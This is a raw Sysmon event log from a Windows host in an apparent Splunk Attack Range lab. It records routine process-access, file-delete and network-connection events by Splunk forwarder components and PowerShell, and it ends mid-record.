13:12:38.570{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496548Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.570{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496547Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.570{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496546Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.570{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-9FC6-6140-5E56-04000000C801}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496545Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.554{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9FC6-6140-5E56-04000000C801}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496544Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.555{B81B27B7-9FC6-6140-5E56-04000000C801}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036496543Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.037{B81B27B7-9FC5-6140-5D56-04000000C801}56162756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496542Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.015{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCE7F5C68ECBA291C87372A680362A1F,SHA256=E6EBBBA3453F8ED3A8435A34375038F6DAF847540354BA59B6E304C1EF35F2B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496541Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:07.916{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50422-false10.0.1.12-8000- 23542300x800000000000000036496567Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:39.621{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1ED810ACBF5A6460822CB3BB6B268783,SHA256=1930848F6DDE4A0FEDC77F392E84B8758C6F7E7837363914D0507DDA5E4094D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496566Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:39.574{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496565Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:39.574{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496564Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:39.574{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496563Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:39.169{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9FC7-6140-5F56-04000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496562Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:39.169{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496561Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:39.169{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496560Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:39.169{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496559Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:39.169{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496558Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:39.169{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-9FC7-6140-5F56-04000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496557Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:39.169{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9FC7-6140-5F56-04000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496556Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:39.155{B81B27B7-9FC7-6140-5F56-04000000C801}1400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496555Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:39.016{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D407A5620F3651854CB674AA853D7AC,SHA256=053EF219C151CE845FF408C853CD49DFB279D68394365899902EE7C6640134B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496570Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:40.158{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1043BBAF824389D1F3219878E9B19B10,SHA256=3A477122D73B91CB4E5726AA06333961D22976F068C391629E630D096DC3E666,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496569Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:10.213{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50423-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496568Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:40.042{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0FE454C86D6497FFF388B9E8AA26D12,SHA256=2232A7485CB7AADDA82D24E29E1300D5A0E2554264178A2D43144356BCFEADCF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496571Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:41.057{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AC32C9751E3A7C7CAA26D7CD0F7C542,SHA256=A77EDA217BC243B3177199F895D88D8C0CA7F88916C0C6DDD056A766EE3E1F7A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496572Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:42.071{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76F2E5F5AF9ED7D03216C38A70A93EDE,SHA256=756C8E3473B733871F9F94FBCDBC91CA5BEA9167DD6292F0CF26AB124A06B6AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496573Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:43.086{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E26585D79EF93F86655268134A8931E,SHA256=A5107B24143467D8BEC36B9DF69D483F41843988ABCEF79338FBD917E07F9844,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496575Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:13.914{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50424-false10.0.1.12-8000- 23542300x800000000000000036496574Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:44.100{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7BEB4051022FBB93476163F0B3606A7,SHA256=127BD2980702DBC05923B2AFDF70E9DE9B8CC6170C2B2B0BDB7FD706F9B95673,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496577Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:45.668{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=94636C45487C498C075C94DFB018C070,SHA256=3D2159404EA431CE9F9F53C9997A7AB217BFFED8933C234002252447B5642ABA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496576Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:45.115{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF7E340F89626D95A07763315B500A2C,SHA256=16DC3AD43138C11807FDEDBD545DE20A54E7FF400BF1C528EEE67AE9AE564721,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496579Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:16.233{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50425-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496578Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:46.136{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAA1CDFD385A3406236588B06D4773C0,SHA256=C0F3D70F3701EDA64C54F510B6251145654303D2EBC6B54894672C535F1CB53F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496580Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:47.183{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0B29E87950E0C100FB26F9585E76F02,SHA256=871D20A7E11C774D737F03E29C4D9CD55229E7759980FD2EFC68C94ABCAE6F80,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496581Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:48.230{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=340ACCEA199DC7FFDA1E39D443E2EE39,SHA256=F810817B59417ADA3D54C0F15CB81AC207BC4AEE704D6B8F1E4F940EF1B15FFC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496583Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:49.680{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 